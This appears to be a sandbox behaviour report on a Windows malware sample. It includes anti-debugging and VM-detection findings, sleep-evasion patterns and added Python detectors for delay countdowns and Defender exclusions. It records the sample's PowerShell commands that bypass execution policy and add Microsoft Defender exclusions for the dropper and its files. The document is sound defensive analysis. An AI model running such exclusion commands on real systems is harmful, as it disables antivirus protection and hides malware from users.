Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4220 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584 | Thread sleep count: 6010 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584 | Thread sleep count: 3727 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | File Volume queried: C:\ FullSizeInformation (2 entries)
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 922337203685477, 600000, 599886, 599766, 599656, 599541, 599406, 599296, 599176, 599003, 598860, 598703, 598594, 598457, 598328, 598219, 598109, 597985, 597860, 597735, 597610, 597485, 597360, 597235, 597110, 596985, 596860, 596735, 596619, 596500, 596374, 596240, 596106, 595984, 595873, 595766, 595641, 595531, 595422, 595313, 595203, 595094, 594969, 594859, 594750, 594641, 594531, 594422, 594313, 594188, 594078, 593969, 593844, 593735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 entries)
Source: 2QaN4hOyJs.exe, 00000000.00000002.2619342449.000000001C034000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
Source: System.0.dr | Binary or memory string: vmware
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Process information queried: ProcessInformation
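The decreasing delay series above (600000 down to 593735, each step roughly 110 to 170 ms) is the shape a deadline-based wait loop leaves when the sandbox shortens every sleep: the sample recomputes the time left and sleeps again, so the intended stall was about ten minutes, assuming, as in other Joe Sandbox reports, that delay time is given in milliseconds. The value 922337203685477 is Int64.MaxValue / 10000, that is TimeSpan.MaxValue expressed in milliseconds, an effectively unbounded wait; it also appears for powershell.exe here, so on its own it is not evidence of evasion. The following Python is an added example, not part of the report and not Joe Sandbox code: it parses rows in the report's row format, groups the delays per process and flags the countdown pattern. The sample rows are constructed from values on this page plus a hypothetical benign control process (explorer.exe) that does not occur in the report.

```python
import re
from collections import defaultdict

# Matches the report's "Source ... Thread delayed: delay time: N" rows, both in the
# flattened form where the path runs straight into the description and in a form with
# a " | " separator. Trailing link text such as "Jump to behavior" is ignored.
_ROW = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Thread delayed: delay time:\s*"
    r"(?P<ms>\d+(?:\s*,\s*\d+)*)"
)

# Int64.MaxValue ticks (100 ns each) / 10000 = TimeSpan.MaxValue in milliseconds.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000  # 922337203685477

# Constructed sample rows: values taken from this report, plus a hypothetical benign
# control process (explorer.exe) that only sleeps briefly and is not in the report.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 600000Jump to behavior",
    r"Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599886Jump to behavior",
    r"Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599766Jump to behavior",
    r"Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599656Jump to behavior",
    r"Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599541Jump to behavior",
    r"Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599406Jump to behavior",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\explorer.exe | Thread delayed: delay time: 100, 100, 100",
]


def parse_delays(lines):
    """Group delay values (ms) by source process, keeping the report's order."""
    delays = defaultdict(list)
    for line in lines:
        m = _ROW.search(line)
        if m:
            delays[m.group("src")].extend(int(v) for v in re.findall(r"\d+", m.group("ms")))
    return dict(delays)


def is_countdown(values, min_step=50, max_step=1000):
    """True when every value is smaller than the previous one by a bounded step.

    A loop that recomputes "time left until deadline" after each sandbox-shortened
    sleep produces exactly this staircase; random jitter or fixed sleeps do not.
    """
    if len(values) < 3:
        return False
    steps = [a - b for a, b in zip(values, values[1:])]
    return all(min_step <= s <= max_step for s in steps)


def assess(values, long_ms=30_000):
    """Summarise one process's delays the way an analyst reads the table."""
    finite = [v for v in values if v < TIMESPAN_MAX_MS]
    countdown = is_countdown(finite)
    return {
        "count": len(values),
        "infinite_waits": len(values) - len(finite),  # TimeSpan.MaxValue sleeps
        "max_ms": max(finite, default=0),
        "long_sleep": any(v >= long_ms for v in finite),
        "countdown": countdown,
        # The first value of a countdown is the stall the author intended (seconds).
        "stall_seconds": finite[0] / 1000 if countdown else None,
    }


def assess_report(lines):
    """Verdict per source process for a list of report rows."""
    return {src: assess(vals) for src, vals in parse_delays(lines).items()}


if __name__ == "__main__":
    for src, verdict in assess_report(SAMPLE_ROWS).items():
        print(src, verdict)
```

A real run would take the whole Behavior section as input; the thresholds (30 s for a long sleep, a 50 to 1000 ms step band for the countdown) are assumptions chosen to fit this report, not Joe Sandbox's own signature parameters.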

Anti Debugging

Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Code function: 0_2_00007FF887D125E3 CheckRemoteDebuggerPresent, 0_2_00007FF887D125E3
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Process token adjusted: Debug (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (4 entries)
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe' (4 entries)
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System' (3 entries)
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2QaN4hOyJs.exe'
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System'
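The Add-MpPreference invocations above carve the dropper, its drop directory (C:\Users\user\AppData\Local\Temp\System) and both process names out of Microsoft Defender scanning. Two practitioner points: the exclusions outlive the process, so remediation has to remove them (Remove-MpPreference, or the Defender settings UI), and Add-MpPreference only takes effect with administrative rights, which this section does not confirm either way. On a host, Get-MpPreference (ExclusionPath, ExclusionProcess) and Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log show the change. The following Python is an added example, not code from the report or from the Sigma rules it references: it classifies PowerShell command lines, unwrapping -EncodedCommand payloads first so the base64 variant named in the signature list is caught too. The sample inputs are the two command lines recorded above, a constructed base64-wrapped variant built inside the block, and a constructed read-only Get-MpPreference control.

```python
import base64
import re

# Cmdlets that change Defender settings, and the parameters that carve out exclusions.
MP_CMDLETS = ("add-mppreference", "set-mppreference")
_VALUE = r"""(?:'[^']*'|"[^"]*"|[^\s,'"]+)"""  # one quoted or bare argument value
_EXCLUSION = re.compile(
    r"-(?P<param>Exclusion(?:Path|Process|Extension|IpAddress))\s+"
    r"(?P<vals>" + _VALUE + r"(?:," + _VALUE + r")*)",  # comma-separated lists allowed
    re.IGNORECASE,
)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_NAMES = ["ec"] + ["encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)]
_ENCODED = re.compile(
    r"-(?:" + "|".join(sorted(_ENC_NAMES, key=len, reverse=True)) + r")\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)
_BYPASS = re.compile(r"-(?:ex[a-z]*|ep)\s+bypass", re.IGNORECASE)

# Constructed sample input: the two exclusion commands recorded in this report, a
# constructed base64-wrapped variant of the same cmdlet, and a benign read-only control.
_PS = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
_ENCODED_PAYLOAD = base64.b64encode(
    "Add-MpPreference -ExclusionProcess 'System'".encode("utf-16-le")
).decode("ascii")
SAMPLE_CMDLINES = [
    _PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe'",
    _PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2QaN4hOyJs.exe'",
    _PS + " -NoProfile -EncodedCommand " + _ENCODED_PAYLOAD,
    _PS + " -ExecutionPolicy Bypass Get-MpPreference",
]


def decode_encoded_command(cmdline):
    """Expand a -EncodedCommand payload (base64 of UTF-16LE) so it reads like plain text."""
    m = _ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not a real payload; inspect the raw line instead
    return cmdline[:m.start()] + decoded


def analyze(cmdline):
    """Return what a detection rule wants to know about one PowerShell command line."""
    text = decode_encoded_command(cmdline)
    exclusions = []
    if any(c in text.lower() for c in MP_CMDLETS):
        for m in _EXCLUSION.finditer(text):
            for raw in re.findall(_VALUE, m.group("vals")):
                exclusions.append((m.group("param").lower(), raw.strip("'\"")))
    return {
        "encoded": text != cmdline,
        "policy_bypass": _BYPASS.search(text) is not None,
        "exclusions": exclusions,
        "suspicious": bool(exclusions),  # reading preferences is not a finding
    }


def flag_exclusion_changes(cmdlines):
    """Keep only the command lines that add Defender exclusions, with their targets."""
    flagged = []
    for c in cmdlines:
        verdict = analyze(c)
        if verdict["suspicious"]:
            flagged.append((c, verdict["exclusions"]))
    return flagged


if __name__ == "__main__":
    for cmd, targets in flag_exclusion_changes(SAMPLE_CMDLINES):
        print(targets, "<-", cmd)
```

The same prefix rule applies to cmdlet parameters, so a production rule should also match abbreviated forms such as -ExclusionPa; the block only recognises the full parameter names the report shows.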

Language, Device and Operating System Detection

Source: Yara match | File source: 2QaN4hOyJs.exe, type: SAMPLE
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Queries volume information: C:\Users\user\Desktop\2QaN4hOyJs.exe VolumeInformation
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\2QaN4hOyJs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

                                    Source: Yara matchFile source: 2QaN4hOyJs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: 2QaN4hOyJs.exe PID: 7544, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED
                                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                    Source: Yara matchFile source: 2QaN4hOyJs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPE
